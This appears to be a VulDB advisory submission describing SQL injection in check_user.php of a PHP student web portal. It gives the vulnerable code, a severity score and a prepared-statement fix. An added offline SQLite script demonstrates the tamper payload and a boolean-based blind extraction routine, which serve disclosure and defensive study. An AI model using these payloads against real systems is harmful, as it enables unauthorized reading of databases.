Submission #748816: code-projects.org STUDENT WEB PORTAL IN PHP WITH SOURCE CODE 1.0 SQL Injection
Information

Title: code-projects.org STUDENT WEB PORTAL IN PHP WITH SOURCE CODE 1.0 SQL Injection
Description:

Summary
Student Web Portal In PHP With Source Code (code-projects.org) contains a SQL Injection vulnerability in check_user.php due to unsafe string concatenation of user-controlled input (the username parameter) into an SQL query. An unauthenticated remote attacker can supply a crafted parameter to manipulate the database query logic, potentially enabling data disclosure and other impacts depending on database privileges and deployment configuration.

Vulnerability Details
Vulnerability Class: SQL Injection
CWE: CWE-89 (Improper Neutralization of Special Elements used in an SQL Command)
Affected Endpoint: /check_user.php?username=...
Affected Parameter: username (HTTP GET)
Affected Component/File: check_user.php
Database/API: MySQL via mysqli

Vulnerable Code (excerpt):
    $query = "select * from user where user_name='".$_GET['username']."'";
    $table = mysqli_query($connection, $query);

Root Cause
User input from $_GET['username'] is directly concatenated into an SQL statement without parameterization, allowing an attacker to inject SQL syntax and alter query semantics. A single quote in the parameter closes the string literal, and everything after it is parsed as SQL.

Impact
Depending on the environment and database permissions, exploitation may allow:
- Manipulation of the username-existence check logic (inconsistent "already exist" vs "available" results)
- Blind SQL Injection (boolean/time-based) to infer database contents even when errors are suppressed, because the only visible output is the exists/available answer
- Potential sensitive data disclosure if the database account has broader read access
The exact impact depends on DB privileges, MySQL configuration, application behavior, and any upstream security controls. Note that mysqli_query() executes a single statement, so stacked queries via this sink would require the application to use mysqli_multi_query(); the practical attack surface here is in-band manipulation of the WHERE clause and boolean/time-based inference.

Severity / CVSS
Recommended CVSS v3.1 Base Score: 7.5 (High)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Rationale: Remote, low complexity, no authentication, no user interaction; primary risk is confidentiality.
Remediation
Primary Fix: Use prepared statements (parameterized queries) and reduce query scope (select only what the check needs instead of the whole row).

Secure Patch Example (mysqli prepared statement):
    <?php
    error_reporting(0);
    include 'config.php'; // provides the mysqli $connection

    if (isset($_GET['username'])) {
        $username = $_GET['username'];

        // The username is bound as a parameter: it is sent to the server as
        // data and is never parsed as part of the SQL text.
        $stmt = mysqli_prepare($connection, "SELECT 1 FROM user WHERE user_name = ? LIMIT 1");
        if ($stmt) {
            mysqli_stmt_bind_param($stmt, "s", $username);
            mysqli_stmt_execute($stmt);
            mysqli_stmt_store_result($stmt);
            if (mysqli_stmt_num_rows($stmt) === 1) {
                echo "Username already exist.";
            } else {
                echo "Username Available";
            }
            mysqli_stmt_close($stmt);
        }
        // If mysqli_prepare() fails nothing is printed; log the error server-side
        // rather than echoing mysqli_error() to the client.
    }
    ?>
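The two things the submission describes, the blind yes/no oracle listed under Impact and the parameterized query given as the fix, side by side in an added example. This is not code from the submission or from the Student Web Portal project. It models the check_user.php query with SQLite so it runs offline; the user table layout, the seeded rows and the role column that gets recovered are constructed for the demonstration, and a real MySQL target differs in quoting details (backslash escapes, comment syntax), so payloads would need adjusting there.

```python
"""Boolean-based blind SQL injection against the concatenation pattern
from check_user.php, modelled locally with SQLite, next to the
parameterized version from the patch.

Added example, not code from the Student Web Portal project. The table
layout (user_name, role), the seeded rows and the extracted `role` value
are constructed. SQLite stands in for MySQL so the script runs offline.
"""
import sqlite3
import string


def make_db() -> sqlite3.Connection:
    """Constructed sample database: one admin row, one ordinary user."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE user (id INTEGER PRIMARY KEY, user_name TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO user (user_name, role) VALUES (?, ?)",
        [("admin", "superuser"), ("alice", "student")],
    )
    return conn


def check_user_vulnerable(conn, username: str) -> str:
    """Mirrors the vulnerable excerpt: input concatenated straight into SQL."""
    query = "select * from user where user_name='" + username + "'"
    rows = conn.execute(query).fetchall()
    return "Username already exist." if rows else "Username Available"


def check_user_fixed(conn, username: str) -> str:
    """Mirrors the patch: the value is bound as data, never parsed as SQL."""
    row = conn.execute(
        "SELECT 1 FROM user WHERE user_name = ? LIMIT 1", (username,)
    ).fetchone()
    return "Username already exist." if row else "Username Available"


def oracle(conn, checker, condition_sql: str) -> bool:
    """Turn the existence check into a yes/no oracle for any SQL condition.

    The closing quote appended by the application pairs with the trailing
    quote in the payload, so the final statement stays well-formed:
        ... where user_name='' OR (<condition>) OR '1'='2'
    """
    payload = "' OR (" + condition_sql + ") OR '1'='2"
    return checker(conn, payload) == "Username already exist."


def extract_role(conn, checker, user_id: int, max_len: int = 32) -> str:
    """Recover user.role for one row a character at a time using only the
    exists/available answer (boolean-based blind SQL injection)."""
    target = f"(SELECT role FROM user WHERE id={user_id})"
    # Learn the length first, then each character position.
    length = next(
        (n for n in range(0, max_len + 1)
         if oracle(conn, checker, f"LENGTH({target})={n}")),
        None,
    )
    if length is None:  # oracle never answered yes: injection did not work
        return ""
    alphabet = string.ascii_lowercase + string.digits + "_"
    recovered = ""
    for pos in range(1, length + 1):
        for ch in alphabet:
            if oracle(conn, checker, f"SUBSTR({target},{pos},1)='{ch}'"):
                recovered += ch
                break
        else:
            recovered += "?"  # character outside the constructed alphabet
    return recovered


def demo() -> dict:
    """Run the tamper payload and the blind extraction against both variants."""
    conn = make_db()
    tamper = "' OR '1'='1"  # no such user, yet the vulnerable check says it exists
    return {
        "vulnerable_tamper": check_user_vulnerable(conn, tamper),
        "fixed_tamper": check_user_fixed(conn, tamper),
        "blind_vulnerable": extract_role(conn, check_user_vulnerable, 1),
        "blind_fixed": extract_role(conn, check_user_fixed, 1),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value!r}")
```

Against the concatenating check the tamper payload reports "already exist" for a username that does not exist, and the oracle recovers the constructed role value without any error output ever reaching the client. The parameterized check returns "Username Available" for the same payloads, because the whole string is compared as a literal user_name and the oracle never answers yes.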
Source: https://github.com/Qing-420/cve/blob/main/sql.md
User: TrySec (UID 94998)
Submitted: 29/01/2026 12:27 (3 months ago)
Moderated: 07/02/2026 09:50 (9 days later)
Status: Accepted
VulDB Entry: 344860 [code-projects Student Web Portal 1.0 /check_user.php username SQL Injection]
Points: 20
